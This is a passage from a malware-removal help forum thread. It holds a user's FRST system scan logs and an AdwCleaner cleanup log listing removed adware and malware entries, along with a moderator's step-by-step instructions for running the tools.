2020-01-15 21:37 - 2019-12-17 01:01 - 002058752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2020-01-15 21:37 - 2019-12-17 01:01 - 000696320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2020-01-15 21:37 - 2019-12-17 01:00 - 001155072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmlmedia.dll
2020-01-15 21:37 - 2019-12-17 00:56 - 013838336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2020-01-15 21:37 - 2019-12-17 00:52 - 001566720 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2020-01-15 21:37 - 2019-12-17 00:43 - 004387840 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2020-01-15 21:37 - 2019-12-17 00:41 - 000800768 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2020-01-15 21:37 - 2019-12-17 00:39 - 001331712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2020-01-15 21:37 - 2019-12-17 00:38 - 000710144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll
2020-01-15 21:37 - 2019-12-12 04:35 - 000271872 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tsmf.dll
2020-01-15 21:37 - 2019-12-12 04:34 - 000253952 _____ (Microsoft) C:\Windows\SysWOW64\DShowRdpFilter.dll
2020-01-15 21:37 - 2019-12-12 04:28 - 000301568 _____ (Microsoft Corporation) C:\Windows\system32\tsmf.dll
2020-01-15 21:37 - 2019-12-12 04:27 - 000284160 _____ (Microsoft) C:\Windows\system32\DShowRdpFilter.dll
2020-01-15 21:37 - 2019-12-10 10:36 - 000375008 _____ (Microsoft Corporation) C:\Windows\system32\clfs.sys
2020-01-15 21:37 - 2019-12-10 09:38 - 001549312 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tquery.dll
2020-01-15 21:37 - 2019-12-10 09:38 - 001400320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mssrch.dll
2020-01-15 21:37 - 2019-12-10 09:38 - 001177088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\crypt32.dll
2020-01-15 21:37 - 2019-12-10 09:38 - 000666624 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mssvp.dll
2020-01-15 21:37 - 2019-12-10 09:38 - 000544768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wiaaut.dll
2020-01-15 21:37 - 2019-12-10 09:38 - 000364544 _____ (Microsoft Corporation) C:\Windows\SysWOW64\StructuredQuery.dll
2020-01-15 21:37 - 2019-12-10 09:38 - 000337408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mssph.dll
2020-01-15 21:37 - 2019-12-10 09:38 - 000328704 _____ (Microsoft Corporation) C:\Windows\SysWOW64\shsvcs.dll
2020-01-15 21:37 - 2019-12-10 09:38 - 000203264 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sti.dll
2020-01-15 21:37 - 2019-12-10 09:38 - 000197120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mssphtb.dll
2020-01-15 21:37 - 2019-12-10 09:38 - 000179712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wintrust.dll
2020-01-15 21:37 - 2019-12-10 09:38 - 000146432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptsvc.dll
2020-01-15 21:37 - 2019-12-10 09:38 - 000113664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wiadss.dll
2020-01-15 21:37 - 2019-12-10 09:38 - 000106496 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptnet.dll
2020-01-15 21:37 - 2019-12-10 09:38 - 000104448 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mssitlb.dll
2020-01-15 21:37 - 2019-12-10 09:38 - 000059392 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msscntrs.dll
2020-01-15 21:37 - 2019-12-10 09:38 - 000034816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mssprxy.dll
2020-01-15 21:37 - 2019-12-10 09:32 - 003165184 _____ (Microsoft Corporation) C:\Windows\system32\wucltux.dll
2020-01-15 21:37 - 2019-12-10 09:32 - 002319360 _____ (Microsoft Corporation) C:\Windows\system32\tquery.dll
2020-01-15 21:37 - 2019-12-10 09:32 - 002222080 _____ (Microsoft Corporation) C:\Windows\system32\mssrch.dll
2020-01-15 21:37 - 2019-12-10 09:32 - 001484800 _____ (Microsoft Corporation) C:\Windows\system32\crypt32.dll
2020-01-15 21:37 - 2019-12-10 09:32 - 000778240 _____ (Microsoft Corporation) C:\Windows\system32\mssvp.dll
2020-01-15 21:37 - 2019-12-10 09:32 - 000670208 _____ (Microsoft Corporation) C:\Windows\system32\wiaaut.dll
2020-01-15 21:37 - 2019-12-10 09:32 - 000583168 _____ (Microsoft Corporation) C:\Windows\system32\wiaservc.dll
2020-01-15 21:37 - 2019-12-10 09:32 - 000491520 _____ (Microsoft Corporation) C:\Windows\system32\mssph.dll
2020-01-15 21:37 - 2019-12-10 09:32 - 000486912 _____ (Microsoft Corporation) C:\Windows\system32\StructuredQuery.dll
2020-01-15 21:37 - 2019-12-10 09:32 - 000371712 _____ (Microsoft Corporation) C:\Windows\system32\shsvcs.dll
2020-01-15 21:37 - 2019-12-10 09:32 - 000295424 _____ (Microsoft Corporation) C:\Windows\system32\sti.dll
2020-01-15 21:37 - 2019-12-10 09:32 - 000288256 _____ (Microsoft Corporation) C:\Windows\system32\mssphtb.dll
2020-01-15 21:37 - 2019-12-10 09:32 - 000229376 _____ (Microsoft Corporation) C:\Windows\system32\wintrust.dll
2020-01-15 21:37 - 2019-12-10 09:32 - 000191488 _____ (Microsoft Corporation) C:\Windows\system32\cryptsvc.dll
2020-01-15 21:37 - 2019-12-10 09:32 - 000149504 _____ (Microsoft Corporation) C:\Windows\system32\sti_ci.dll
2020-01-15 21:37 - 2019-12-10 09:32 - 000141824 _____ (Microsoft Corporation) C:\Windows\system32\wiadss.dll
2020-01-15 21:37 - 2019-12-10 09:32 - 000141824 _____ (Microsoft Corporation) C:\Windows\system32\cryptnet.dll
2020-01-15 21:37 - 2019-12-10 09:32 - 000115200 _____ (Microsoft Corporation) C:\Windows\system32\mssitlb.dll
2020-01-15 21:37 - 2019-12-10 09:32 - 000099840 _____ (Microsoft Corporation) C:\Windows\system32\mssprxy.dll
2020-01-15 21:37 - 2019-12-10 09:32 - 000098816 _____ (Microsoft Corporation) C:\Windows\system32\wudriver.dll
2020-01-15 21:37 - 2019-12-10 09:32 - 000075264 _____ (Microsoft Corporation) C:\Windows\system32\msscntrs.dll
2020-01-15 21:37 - 2019-12-10 09:32 - 000067072 _____ (Microsoft Corporation) C:\Windows\system32\wiarpc.dll
2020-01-15 21:37 - 2019-12-10 09:32 - 000014848 _____ (Microsoft Corporation) C:\Windows\system32\wiatrace.dll
2020-01-15 21:37 - 2019-12-10 09:32 - 000014336 _____ (Microsoft Corporation) C:\Windows\system32\msshooks.dll
2020-01-15 21:37 - 2019-12-10 09:23 - 000573440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wuapi.dll
2020-01-15 21:37 - 2019-12-10 09:22 - 000428544 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SearchIndexer.exe
2020-01-15 21:37 - 2019-12-10 09:22 - 000164352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SearchProtocolHost.exe
2020-01-15 21:37 - 2019-12-10 09:22 - 000093184 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wudriver.dll
2020-01-15 21:37 - 2019-12-10 09:22 - 000086528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SearchFilterHost.exe
2020-01-15 21:37 - 2019-12-10 09:22 - 000030208 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wups.dll
2020-01-15 21:37 - 2019-12-10 09:22 - 000012800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wiatrace.dll
2020-01-15 21:37 - 2019-12-10 09:22 - 000009728 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msshooks.dll
2020-01-15 21:37 - 2019-12-10 09:17 - 006136320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstscax.dll
2020-01-15 21:37 - 2019-12-10 09:17 - 002651136 _____ (Microsoft Corporation) C:\Windows\system32\wuaueng.dll
2020-01-15 21:37 - 2019-12-10 09:16 - 000709120 _____ (Microsoft Corporation) C:\Windows\system32\wuapi.dll
2020-01-15 21:37 - 2019-12-10 09:16 - 000140288 _____ (Microsoft Corporation) C:\Windows\system32\wuauclt.exe
2020-01-15 21:37 - 2019-12-10 09:16 - 000037888 _____ (Microsoft Corporation) C:\Windows\system32\wups2.dll
2020-01-15 21:37 - 2019-12-10 09:16 - 000036864 _____ (Microsoft Corporation) C:\Windows\system32\wups.dll
2020-01-15 21:37 - 2019-12-10 09:16 - 000012288 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\serscan.sys
2020-01-15 21:37 - 2019-12-10 09:15 - 000594432 _____ (Microsoft Corporation) C:\Windows\system32\SearchIndexer.exe
2020-01-15 21:37 - 2019-12-10 09:15 - 000249856 _____ (Microsoft Corporation) C:\Windows\system32\SearchProtocolHost.exe
2020-01-15 21:37 - 2019-12-10 09:14 - 000113664 _____ (Microsoft Corporation) C:\Windows\system32\SearchFilterHost.exe
2020-01-15 21:37 - 2019-12-10 09:01 - 003233280 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2020-01-15 21:37 - 2019-12-10 08:56 - 000754176 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\http.sys
2020-01-15 21:37 - 2019-12-10 07:17 - 007084032 _____ (Microsoft Corporation) C:\Windows\system32\mstscax.dll
2020-01-13 19:45 - 2020-01-13 19:45 - 000000668 _____ C:\Users\Public\Desktop\A bootable USB.lnk
2020-01-13 19:45 - 2020-01-13 19:45 - 000000668 _____ C:\ProgramData\Desktop\A bootable USB.lnk

==================== One month (modified) ==================

(If an entry is included in the fixlist, the file/folder will be moved.)

2020-02-06 21:28 - 2019-05-12 10:51 - 000000000 ____D C:\Program Files\SoftEther VPN Client
2020-02-06 21:10 - 2009-07-14 05:45 - 000027360 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2020-02-06 21:10 - 2009-07-14 05:45 - 000027360 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2020-02-06 21:09 - 2018-02-13 09:42 - 000000000 ____D C:\Windows\SysWOW64\Macromed
2020-02-06 21:09 - 2018-01-07 22:45 - 000003372 _____ C:\Windows\system1AKVrrKGSDtbLrcW77HPEwrJM2Ej2yFNYw
2020-02-06 21:09 - 2018-01-07 22:45 - 000003244 _____ C:\Windows\system1GV9Jm2u7rmsCe65wKzPTw5jtS38n2tVEGie
2020-02-06 21:04 - 2009-07-14 06:13 - 000006170 _____ C:\Windows\system32\PerfStringBackup.INI
2020-02-06 21:04 - 2009-07-14 04:20 - 000000000 ____D C:\Windows\inf
2020-02-06 20:58 - 2018-01-07 19:36 - 000000000 ____D C:\Users\Jomko\AppData\LocalLow\Mozilla
2020-02-06 20:58 - 2018-01-07 19:33 - 000000000 __SHD C:\Users\Jomko\IntelGraphicsProfiles
2020-02-06 20:58 - 2018-01-07 19:27 - 000000000 ____D C:\ProgramData\NVIDIA
2020-02-06 20:58 - 2009-07-14 06:08 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2020-01-26 22:57 - 2018-01-08 09:18 - 000001024 ____H C:\AMTAG.BIN
2020-01-26 21:01 - 2009-07-14 06:08 - 000032566 _____ C:\Windows\Tasks\SCHEDLGU.TXT
2020-01-26 20:16 - 2018-06-15 20:12 - 000037692 _____ C:\Windows\ntbtlog.txt
2020-01-26 20:13 - 2009-07-14 05:45 - 000012288 _____ C:\Windows\system32\umstartup.etl
2020-01-26 17:50 - 2018-01-12 17:01 - 000000000 ____D C:\Program Files (x86)\SpeedFan
2020-01-26 15:18 - 2018-02-15 20:31 - 000000000 ____D C:\Users\Jomko\AppData\Local\CrashDumps
2020-01-24 21:54 - 2018-01-16 15:01 - 000000000 ____D C:\Windows\Minidump
2020-01-24 16:33 - 2018-01-08 18:51 - 000000000 ____D C:\Users\Jomko\AppData\Roaming\FileZilla
2020-01-23 00:40 - 2018-01-07 22:46 - 000002245 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2020-01-23 00:40 - 2018-01-07 22:46 - 000002204 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2020-01-23 00:40 - 2018-01-07 22:46 - 000002204 _____ C:\ProgramData\Desktop\Google Chrome.lnk
2020-01-22 23:07 - 2018-01-11 14:10 - 000000000 ____D C:\ProgramData\Package Cache
2020-01-22 23:06 - 2018-01-07 22:53 - 000000000 ____D C:\Portable
2020-01-22 20:07 - 2018-05-28 20:39 - 000000000 ____D C:\Users\Jomko\Documents\Bluetooth Folder
2020-01-22 20:05 - 2009-07-14 03:34 - 000000215 _____ C:\Windows\system.ini
2020-01-22 20:04 - 2009-07-14 03:34 - 095895552 _____ C:\Windows\system32\config\SOFTWARE.bak
2020-01-22 20:04 - 2009-07-14 03:34 - 023920640 _____ C:\Windows\system32\config\SYSTEM.bak
2020-01-22 20:04 - 2009-07-14 03:34 - 001847296 _____ C:\Windows\system32\config\DEFAULT.bak
2020-01-22 20:04 - 2009-07-14 03:34 - 000061440 _____ C:\Windows\system32\config\SAM.bak
2020-01-22 20:04 - 2009-07-14 03:34 - 000028672 _____ C:\Windows\system32\config\SECURITY.bak
2020-01-22 18:06 - 2019-05-01 00:02 - 000000000 ____D C:\Windows\SysWOW64\NV
2020-01-22 18:06 - 2019-05-01 00:02 - 000000000 ____D C:\Windows\system32\NV
2020-01-22 17:10 - 2019-10-20 16:56 - 000000000 ____D C:\Users\Jomko\Desktop\Staré údaje Firefoxu
2020-01-22 15:00 - 2018-01-07 19:36 - 000000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2020-01-22 13:31 - 2018-01-11 23:49 - 000000000 ____D C:\Users\Jomko\AppData\Local\ElevatedDiagnostics
2020-01-22 13:31 - 2009-07-14 04:20 - 000000000 ____D C:\Windows\system32\NDF
2020-01-21 17:06 - 2018-03-14 20:52 - 000004466 _____ C:\Windows\system32\Tasks\Adobe Flash Player NPAPI Notifier
2020-01-21 17:06 - 2018-02-13 09:42 - 000842296 _____ (Adobe) C:\Windows\SysWOW64\FlashPlayerApp.exe
2020-01-21 17:06 - 2018-02-13 09:42 - 000175160 _____ (Adobe) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2020-01-21 17:06 - 2018-02-13 09:42 - 000004324 _____ C:\Windows\system32\Tasks\Adobe Flash Player Updater
2020-01-21 17:06 - 2018-02-13 09:42 - 000000000 ____D C:\Windows\system32\Macromed
2020-01-21 11:02 - 2018-01-08 18:51 - 000000000 ____D C:\Users\Jomko\AppData\Local\FileZilla
2020-01-21 11:01 - 2018-01-08 18:51 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\FileZilla FTP Client
2020-01-21 11:01 - 2018-01-08 18:51 - 000000000 ____D C:\Program Files\FileZilla FTP Client
2020-01-20 20:32 - 2019-05-24 18:27 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2020-01-20 20:32 - 2019-05-24 18:27 - 000000000 ____D C:\Program Files\Java
2020-01-20 20:31 - 2019-05-24 18:27 - 000129088 _____ (Oracle Corporation) C:\Windows\system32\WindowsAccessBridge-64.dll
2020-01-18 12:45 - 2018-01-23 15:41 - 000000000 ____D C:\Users\Jomko\AppData\Roaming\XnView
2020-01-17 14:13 - 2018-01-12 21:25 - 000004608 _____ C:\Users\Jomko\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2020-01-16 15:00 - 2018-01-08 09:18 - 000000000 ____D C:\Program Files (x86)\AOMEI Partition Assistant Standard Edition 6.6
2020-01-16 13:58 - 2019-03-29 18:51 - 000000000 ____D C:\Users\Jomko\AppData\Roaming\Logishrd
2020-01-16 13:58 - 2018-02-21 21:47 - 000000000 ____D C:\Users\Jomko\AppData\Local\Deployment
2020-01-15 23:15 - 2009-07-14 05:45 - 000360416 _____ C:\Windows\system32\FNTCACHE.DAT
2020-01-15 21:45 - 2018-01-07 22:46 - 000000000 ____D C:\Windows\system32\MRT
2020-01-15 21:40 - 2018-01-07 22:46 - 120202352 ____C (Microsoft Corporation) C:\Windows\system32\MRT.exe
2020-01-08 00:08 - 2019-05-24 18:28 - 000000000 ____D C:\Users\Jomko\AppData\Roaming\.minecraft

==================== Files in the root of some directories ========

2018-01-12 20:03 - 2018-01-12 20:03 - 000000437 _____ () C:\Users\Jomko\AppData\Roaming\ImageTuner.ini
2018-01-12 21:25 - 2020-01-17 14:13 - 000004608 _____ () C:\Users\Jomko\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2018-01-10 00:20 - 2018-01-10 00:20 - 000000001 _____ () C:\Users\Jomko\AppData\Local\llftool.4.40.agreement
2019-07-15 23:58 - 2019-07-15 23:58 - 000015468 _____ () C:\Users\Jomko\AppData\Local\recently-used.xbel
2019-07-11 06:58 - 2019-07-11 06:58 - 000012216 _____ () C:\Users\Jomko\AppData\Local\recently-used.xbel.NCNJ4Z
2018-03-22 16:27 - 2019-04-14 22:21 - 000007610 _____ () C:\Users\Jomko\AppData\Local\Resmon.ResmonCfg

==================== SigCheck ============================

(There is no automatic fix for files that do not pass verification.)


LastRegBack: 2020-01-18 14:26
==================== End of FRST.txt ========================

Rudy
Site Admin
Posts: 118275
Joined: 30 Oct 2003 13:42
Location: Plzeň

Re: Please check my FRST log

#2 Post by Rudy »

Hello!
Run this utility:
Save AdwCleaner to your desktop: https://malwarebytes.com/adwcleaner/ or http://www.bleepingcomputer.com/download/adwcleaner/

close all programs
accept the license terms (EULA) by clicking Souhlasim (I agree)
right-click the AdwCleaner icon and choose Run as administrator (on Win XP, simply start it with a double-click)
click Skenovat nyni (Scan now), then Cisteni a opravy (Clean and Repair)
after the restart a log will pop up (or you can find it in C:\AdwCleaner\Logs\AdwCleaner[Cxx].txt); copy its contents into your next reply
Post questions and logs only in your own threads. Private messages, ICQ and e-mails are not for solving your problems.

Please support our forum: https://platba.viry.cz/payment/.

e-mail: rudy(at)forum.viry.cz

Warning:
Before disinfecting your PC, back up your important data (mail, contacts, documents, photos, videos, music, etc.). Besides its "visible" activities, a virus can damage the system!


Once your problem is resolved, the thread will be locked. The same applies if it is inactive for more than 14 days. If you want the thread reactivated, write to me at the e-mail address given above.

Jomko
Visitor
Posts: 26
Joined: 16 Mar 2011 09:54

Re: Please check my FRST log

#3 Post by Jomko »

I ran it, this is the result

# -------------------------------
# Malwarebytes AdwCleaner 8.0.2.0
# -------------------------------
# Build: 01-27-2020
# Database: 2020-01-24.1 (Cloud)
# Support: https://www.malwarebytes.com/support
#
# -------------------------------
# Mode: Clean
# -------------------------------
# Start: 02-07-2020
# Duration: 00:00:02
# OS: Windows 7 Professional
# Cleaned: 70
# Failed: 1


***** [ Services ] *****

Deleted Main Service
Deleted WinDefender

***** [ Folders ] *****

Deleted C:\Users\Jomko\AppData\Local\DriverToolkit
Deleted C:\Users\Jomko\AppData\Roaming\EpicNet Inc
Not Deleted C:\Windows\rss

***** [ Files ] *****

Deleted C:\Windows\Reimage.ini
Deleted C:\Windows\System32\drivers\Winmon.sys
Deleted C:\Windows\System32\drivers\WinmonFS.sys
Deleted C:\Windows\System32\drivers\WinmonProcessMonitor.sys
Deleted C:\Windows\restoro.ini
Deleted C:\Windows\windefender.exe

***** [ DLL ] *****

No malicious DLLs cleaned.

***** [ WMI ] *****

No malicious WMI cleaned.

***** [ Shortcuts ] *****

No malicious shortcuts cleaned.

***** [ Tasks ] *****

Deleted C:\Windows\System32\Tasks\SCHEDULEDUPDATE

***** [ Registry ] *****

Deleted HKCU\Software\DriverToolkit
Deleted HKCU\Software\EpicNet Inc.
Deleted HKCU\Software\GCleaner
Deleted HKCU\Software\Lavasoft\Web Companion
Deleted HKCU\Software\Local AppWizard-Generated Applications\Restoro
Deleted HKCU\Software\Microsoft\Internet Explorer\Main|Start Page
Deleted HKCU\Software\LgjH2m5c8emE66pjdExmgep47BAdKTrCJ7xt\Settings\{10ECCE17-29B5-4880-A8F5-EAD298611484}
Deleted HKCU\Software\LgjH2m5c8emE66pjdExmgep47BAdKTrCJ7nternet Settings\ZoneMap\Domains\webcompanion.com
Deleted HKCU\Software\LgjH2m5c8emE66pjdExmgep47BAdKTrCJ7un|cloudnet
Deleted HKCU\Software\LgjH2m5c8emE66pjdExmgep47BAdKTrCJ7ninstall\CloudNet
Deleted HKCU\Software\Reimage
Deleted HKCU\Software\Restoro
Deleted HKLgjH2m5c8emE66pjdExmgep47BAdKTrCJ7ntrol.DLL
Deleted HKLM\SOFTWARE\MICROSOFT\Speedycar
Deleted HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{0760CF23-E27C-42D7-9E44-6B3896E46166}
Deleted HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\ScheduledUpdate
Deleted HKLM\Software\Classes\AppID\{28FF42B8-A0DA-4BE5-9B81-E26DD59B350A}
Deleted HKLM\Software\Classes\CLSID\{10ECCE17-29B5-4880-A8F5-EAD298611484}
Deleted HKLM\Software\Classes\CLSID\{801B440B-1EE3-49B0-B05D-2AB076D4E8CB}
Deleted HKLM\Software\Classes\CLSID\{AE198C69-7358-4856-9029-F4C0FAD524C1}
Deleted HKLM\Software\Classes\CLSID\{BA827421-E282-479E-AE60-34796877B8AE}
Deleted HKLM\Software\Classes\Interface\{9BB31AD8-5DB2-459E-A901-DEA536F23BA4}
Deleted HKLM\Software\Classes\Interface\{BD51A48E-EB5F-4454-8774-EF962DF64546}
Deleted HKLM\Software\Classes\REI_AxControl.ReiEngine
Deleted HKLM\Software\Classes\REI_AxControl.ReiEngine.1
Deleted HKLM\Software\Classes\TypeLib\{FA6468D2-FAA4-4951-A53B-2A5CF9CC0A36}
Deleted HKLgjH2m5c8emE66pjdExmgep47BAdKTrCJ7sktopnew
Deleted HKLM\Software\Reimage
Deleted HKLM\Software\Restoro
Deleted HKLgjH2m5c8emE66pjdExmgep47BAdKTrCJ7eb Companion
Deleted HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQCeall\AddressBook|DisplayIcon
Deleted HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQCeall\AddressBook|UninstallString
Deleted HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQCeall\Aomei Partition Assistant_is1|DisplayIcon
Deleted HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQCeall\Aomei Partition Assistant_is1|UninstallString
Deleted HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQCeall\Connection Manager|DisplayIcon
Deleted HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQCeall\Connection Manager|UninstallString
Deleted HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQCeall\DirectDrawEx|DisplayIcon
Deleted HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQCeall\DirectDrawEx|UninstallString
Deleted HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQCeall\Fontcore|DisplayIcon
Deleted HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQCeall\Fontcore|UninstallString
Deleted HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQCeall\IE40|DisplayIcon
Deleted HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQCeall\IE40|UninstallString
Deleted HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQCeall\IE4Data|DisplayIcon
Deleted HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQCeall\IE4Data|UninstallString
Deleted HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQCeall\IE5BAKEX|DisplayIcon
Deleted HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQCeall\IE5BAKEX|UninstallString
Deleted HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQCeall\IEData|DisplayIcon
Deleted HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQCeall\IEData|UninstallString
Deleted HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQCeall\MobileOptionPack|DisplayIcon
Deleted HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQCeall\MobileOptionPack|UninstallString
Deleted HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQCeall\SchedulingAgent|DisplayIcon
Deleted HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQCeall\SchedulingAgent|UninstallString
Deleted HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQCeall\WIC|DisplayIcon
Deleted HKLgjH2m5c8emE66pjdExmgep47BAdKTrsso2Vu8Ke6GEY5W51wwPPMqKZJowXQCeall\WIC|UninstallString
Deleted HKLgjH2m5c8emE66pjdExmgep47BAdKTrCJ7KzPTw5jtS38n2tVEGi.DLL
Deleted HKLgjH2m5c8emE66pjdExmgep47BAdKTrCJ7ppID\{28FF42B8-A0DA-4BE5-9B81-E26DD59B350A}
Deleted HKLgjH2m5c8emE66pjdExmgep47BAdKTrCJ7nterface\{9BB31AD8-5DB2-459E-A901-DEA536F23BA4}
Deleted HKLgjH2m5c8emE66pjdExmgep47BAdKTrCJ7nterface\{BD51A48E-EB5F-4454-8774-EF962DF64546}
Deleted HKLgjH2m5c8emE66pjdExmgep47BAdKTrCJ7ypeLib\{FA6468D2-FAA4-4951-A53B-2A5CF9CC0A36}

***** [ Chromium (and derivatives) ] *****

No malicious Chromium entries cleaned.

***** [ Chromium URLs ] *****

No malicious Chromium URLs cleaned.

***** [ Firefox (and derivatives) ] *****

No malicious Firefox entries cleaned.

***** [ Firefox URLs ] *****

No malicious Firefox URLs cleaned.

***** [ Hosts File Entries ] *****

No malicious hosts file entries cleaned.

***** [ Preinstalled Software ] *****

No Preinstalled Software cleaned.


*************************

[+] Delete Tracing Keys
[+] Reset Winsock

*************************

AdwCleaner[S00].txt - [8322 octets] - [07/02/2020 20:41:39]

########## EOF - C:\AdwCleaner\Logs\AdwCleaner[C00].txt ##########

Rudy
Site Admin
Posts: 118275
Registered: 30 Oct 2003 13:42
Location: Plzeň

Re: Please check my FRST log

#4 Post by Rudy »

Post new FRST + Addition logs.
Post questions and logs only in your own threads. Private messages, ICQ and e-mails are not for solving your problems.

Please support our forum: https://platba.viry.cz/payment/.


e-mail: rudy(at)forum.viry.cz

Warning:
Before disinfecting your PC, back up your important data (mail, contacts, documents, photos, videos, music, etc.). Besides its "visible" activity, a virus can damage the system!


Once your problem is resolved, the thread will be locked. The same applies if it is inactive for more than 14 days. If you want the thread reactivated, write to me at the e-mail address given above.

Jomko
Visitor
Posts: 26
Registered: 16 Mar 2011 09:54

Re: Please check my FRST log

#5 Post by Jomko »

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 02-02-2020 02
Ran by Jomko (administrator) on JOMKO_WIN7 (TOSHIBA SATELLITE P50-A-13C) (07-02-2020 20:55:17)
Running from C:\Users\Jomko\Desktop
Loaded Profiles: Jomko (Available Profiles: Jomko)
Platform: Windows 7 Professional Service Pack 1 (X64) Language: Slovenčina (Slovensko)
Internet Explorer Version 11 (Default browser: FF)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/33 ... scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

() [File not signed] C:\Windows\rss\csrss.exe
(Access Denied) [File not signed] C:\Windows\windefender.exe
(ActMask Group Co., Ltd -> ActMask Co.,Ltd - hxxp://WWW.ALL2PDF.COM) C:\Windows\System32\PrintCtrl.exe
(ActMask Group Co., Ltd -> ActMask Co.,Ltd - hxxp://www.all2pdf.com) C:\Windows\System32\PrintDisp.exe
(ActMask Group Co., Ltd -> ActMask Co.,Ltd - hxxp://www.all2pdf.com) C:\Windows\System32\PrintDisp.exe
(Adobe Inc. -> Adobe Systems) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
(Apple Inc. -> Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Apple Inc. -> Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
